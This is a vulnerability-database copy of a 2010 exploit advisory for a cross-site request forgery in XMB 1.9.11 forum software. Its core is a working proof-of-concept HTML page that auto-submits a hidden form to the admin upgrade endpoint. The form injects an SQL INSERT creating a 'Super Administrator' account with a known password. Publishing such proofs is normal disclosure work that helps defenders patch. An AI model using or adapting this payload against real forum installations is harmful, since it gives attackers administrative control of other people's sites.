Lucene search
K

XMB 1.9.11 Cross Site Request Forgery

🗓️ 17 Sep 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

XMB 1.9.11 Cross-site Request Forgery allows arbitrary SQL executio

Code
`<!------------------------------------------------------------------------  
# Software................XMB 1.9.11  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://www.xmbforum.com/  
# Release Date............9/16/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://www.johnleitch.net/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in XMB 1.9.11 can be  
# exploited to execute arbitrary SQL.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/xmb/cp.php?action=upgrade">  
<input type="hidden" name="upgrade" value="INSERT INTO xmb_members (username, password, status) VALUES ('new_admin', md5('Password1'), 'Super Administrator')" />  
<input type="hidden" name="upgradesubmit" value="Submit Changes" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation